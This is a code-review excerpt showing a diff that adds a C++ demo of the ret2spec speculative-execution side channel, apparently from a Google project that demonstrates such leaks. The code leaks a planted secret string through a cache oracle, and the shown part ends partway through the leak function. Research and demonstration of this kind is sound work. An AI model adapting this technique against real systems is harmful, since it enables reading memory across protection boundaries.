demos/ret2spec.cc

```diff
@@ -0,0 +1,123 @@
+/*
+ * Copyright 2019 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *   https://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <algorithm>
+#include <array>
+#include <cstring>
+#include <iostream>
+#include <string>
+#include <tuple>
+#include <vector>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+
+// TODO(asteinha) Implement support for MSVC and Windows.
+// TODO(asteinha) Investigate the exploitability of PowerPC.
+
+// Private data that is accessed only speculatively. The architectural access
+// to it is unreachable in the control flow.
+const char *private_data = "It's a s3kr3t!!!";
+
+// Global variable stores for avoiding to pass data through function arguments.
+size_t current_offset;
+const std::array<BigByte, 256> *oracle_ptr;
+
+// Call a "UnwindStackAndSlowlyReturn.." function which unwinds the stack
+// jumping back to the "afterspeculation" label in the "leak_byte" function
+// never executing the code that follows.
+#ifdef _MSC_VER
+__declspec(noinline)
+#elif defined(__GNUC__)
+__attribute__((noinline))
+#else
+#  error Unsupported compiler.
+#endif
+static void speculation() {
+#if defined(__i386__) || defined(__x86_64__) || defined(_M_X64) || \
+    defined(_M_IX86)
+  UnwindStackAndSlowlyReturnTo(afterspeculation); // Never returns back here.
+#elif defined(__aarch64__)
+  UnwindStackAndSlowlyReturn(); // Never returns back here.
+#else
+#  error Unsupported architecture.
+#endif
+
+  // Everything that follows this is architecturally dead code. Never reached.
+  // However, the first two statements are executed speculatively.
+  const std::array<BigByte, 256> &isolated_oracle = *oracle_ptr;
+  ForceRead(&isolated_oracle[static_cast<size_t>(
+      private_data[current_offset])]);
+
+  std::cout << "If this is printed, it signifies a fatal error. "
+            << "This print statement is architecturally dead." << std::endl;
+
+  // Avoid optimizing out everything that follows the speculation call because
+  // of the exit. Clang does that when the exit call is unconditional.
+  if (strlen(private_data) != 0) {
+    exit(EXIT_FAILURE);
+  }
+}
+
+static char leak_byte() {
+  CacheSideChannel sidechannel;
+  oracle_ptr = &sidechannel.GetOracle(); // Save the pointer to global storage.
+
+  // Using volatile variables in order to avoid register spoiling.
```

Comment:
Add an explanation of what "spoiling" means and why it happens here.

Reply:
This is probably not necessary anymore. Removed.